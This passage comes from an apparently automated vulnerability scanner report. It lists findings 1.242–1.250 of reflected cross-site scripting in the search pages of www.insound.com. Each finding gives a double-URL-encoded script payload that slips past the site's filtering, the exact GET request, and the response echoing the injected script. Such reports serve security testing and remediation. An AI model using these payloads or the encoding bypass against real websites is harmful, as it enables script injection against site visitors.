Content-Length: 23313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Purling Hissfcea5</title><script>alert(1)</script>bbc3f0798f6</title>
...[SNIP]...

1.242. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Purling%20Hiss&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f0ec8c4343 was submitted in the REST URL parameter 3. This input was echoed as 7db43"><script>alert(1)</script>5f0ec8c4343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Purling%20Hiss7db43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f0ec8c4343&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kn8buhkog2gkunbsu6840sj3n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=465494046; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=149641399; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Purling Hiss7db43"><script>alert(1)</script>5f0ec8c4343" />
...[SNIP]...

1.243. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Raekwon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c34ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73286eaf417 was submitted in the REST URL parameter 3. This input was echoed as c34ef</title><script>alert(1)</script>73286eaf417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Raekwonc34ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73286eaf417&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b4q9e19to5r83cnmb4pgedg9f7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=483188194; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=449263942; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Raekwonc34ef</title><script>alert(1)</script>73286eaf417</title>
...[SNIP]...

1.244. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Raekwon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6560a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed584a60ee94 was submitted in the REST URL parameter 3. This input was echoed as 6560a"><script>alert(1)</script>d584a60ee94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Raekwon6560a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed584a60ee94&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aok39832smftirj49l9nklua72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=108066889; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=152619735; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Raekwon6560a"><script>alert(1)</script>d584a60ee94" />
...[SNIP]...

1.245. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Residual%20Echoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaddd2ad8ed3 was submitted in the REST URL parameter 3. This input was echoed as c78d8"><script>alert(1)</script>addd2ad8ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Residual%20Echoesc78d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaddd2ad8ed3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1mopln8na91lau6dec3pfc8dv4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=259160912; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=425413843; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Residual Echoesc78d8"><script>alert(1)</script>addd2ad8ed3" />
...[SNIP]...

1.246. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Residual%20Echoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b1c96%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a7f7f97f3 was submitted in the REST URL parameter 3. This input was echoed as b1c96</title><script>alert(1)</script>4a7f7f97f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Residual%20Echoesb1c96%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a7f7f97f3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1nufmcpi5ttjnc4gpbhmg3o4f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235712226; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=189297920; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Residual Echoesb1c96</title><script>alert(1)</script>4a7f7f97f3</title>
...[SNIP]...

1.247. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rihanna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload afcce%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e688e097aeb1 was submitted in the REST URL parameter 3. This input was echoed as afcce</title><script>alert(1)</script>688e097aeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rihannaafcce%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e688e097aeb1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=r5gh1gqj9md5fte2ckh08madr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=178756689; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=29160399; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Rihannaafcce</title><script>alert(1)</script>688e097aeb1</title>
...[SNIP]...

1.248. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rihanna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51396%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef815a78008b was submitted in the REST URL parameter 3. This input was echoed as 51396"><script>alert(1)</script>f815a78008b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rihanna51396%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef815a78008b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i7oq4quv18pmck4l9057dotl76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=212609566; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=364849586; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Rihanna51396"><script>alert(1)</script>f815a78008b" />
...[SNIP]...

1.249. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rita%20Indiana&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8b4f3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e039ab75402c was submitted in the REST URL parameter 3. This input was echoed as 8b4f3</title><script>alert(1)</script>039ab75402c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rita%20Indiana8b4f3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e039ab75402c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k3u4eec4e4ud3ddsohj1vhcn67; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=49177946; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=364255175; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Rita Indiana8b4f3</title><script>alert(1)</script>039ab75402c</title>
...[SNIP]...

1.250. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rita%20Indiana&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec45724353e8 was submitted in the REST URL parameter 3. This input was echoed as ebac5"><script>alert(1)</script>c45724353e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rita%20Indianaebac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec45724353e8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rfn9qtf6ivk7f3vsen3fp9uki2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=101984597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=195512113; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.